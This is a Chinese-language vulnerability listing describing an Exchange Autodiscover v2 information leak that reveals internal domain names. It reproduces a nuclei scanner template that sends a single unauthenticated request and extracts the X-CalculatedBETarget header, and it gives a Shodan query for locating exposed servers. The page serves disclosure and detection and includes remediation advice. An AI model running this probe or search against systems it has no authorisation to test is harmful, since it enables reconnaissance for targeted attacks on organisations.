Microsoft Exchange Autodiscover - Local Domain Exposure

漏洞信息

漏洞名称: Microsoft Exchange Autodiscover - Local Domain Exposure

漏洞类型: 信息泄露

漏洞等级: 中危

漏洞描述: Microsoft Exchange是一种广泛使用的邮件服务器和日历服务器软件,常见于企业环境中,用于处理电子邮件、日历、联系人等。它支持多种协议,包括ActiveSync,以便移动设备可以同步邮件和日历。Autodiscover服务是Exchange的一个功能,旨在简化客户端配置,自动发现用户的邮箱设置。然而,Autodiscover v2端点存在一个信息泄露漏洞,可能暴露本地域名信息。这种漏洞的根源在于Autodiscover服务的不当配置,使得攻击者可以通过构造特定的HTTP请求,获取到本应保密的内网域名信息。虽然这种漏洞不会直接导致远程代码执行或服务中断,但它为攻击者提供了宝贵的信息,可用于进一步的侦察和目标攻击。攻击者可以利用这些信息来识别内部网络结构,策划更有针对性的攻击。由于此漏洞不需要认证即可利用,且可以通过自动化工具进行探测,因此对企业的安全构成了实际威胁。建议企业限制对Autodiscover服务的访问,或配置服务以不暴露本地域名信息,从而减轻潜在的风险。

产品厂商: microsoft

产品名称: exchange_server

搜索语法: http.title:outlook exchange

来源: https://github.com/projectdiscovery/nuclei-templates/blob/e2910a9c296ab0d659cc4b9342fc56aa7deb5915/http%2Fmisconfiguration%2Fmicrosoft%2Fms-exchange-local-domain.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

id: ms-exchange-local-domain

info:
  name: Microsoft Exchange Autodiscover - Local Domain Exposure
  author: userdehghani
  severity: info
  description: |
    Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint.
  impact: |
    An attacker can leverage this information for reconnaissance and targeted attacks.
  remediation: |
    Restrict access to the Autodiscover service or configure it to not expose local domain information.
  reference:
    - https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
    cwe-id: CWE-200
    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:outlook exchange
    product: exchange_server
    vendor: microsoft
  tags: misconfig,microsoft,ms-exchange,ad,dc

http:
  - method: GET
    path:
      - "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - "(?i)(X-Calculatedbetarget:)"

      - type: status
        status:
          - 200
          - 302

    extractors:
      - type: kval
        kval:
          - x_calculatedbetarget
# digest: 4a0a0047304502210098ed614b0123624f7a67c4b5487f5831925d23da990846ebac46f04f8269fc3d02202c7a09a84befb943fb82e3dd3321d2685b5a5dc88123d456821e1b45a90a5683:922c64590222798bb761d5b6d8e72950


Github Poc
#projectdiscovery/nuclei-templates:github issues #信息泄露
Microsoft Exchange Autodiscover - Local Domain Exposure
http://example.com/2025/07/22/github_1701491247/
作者
lianccc
发布于
2025年7月22日
许可协议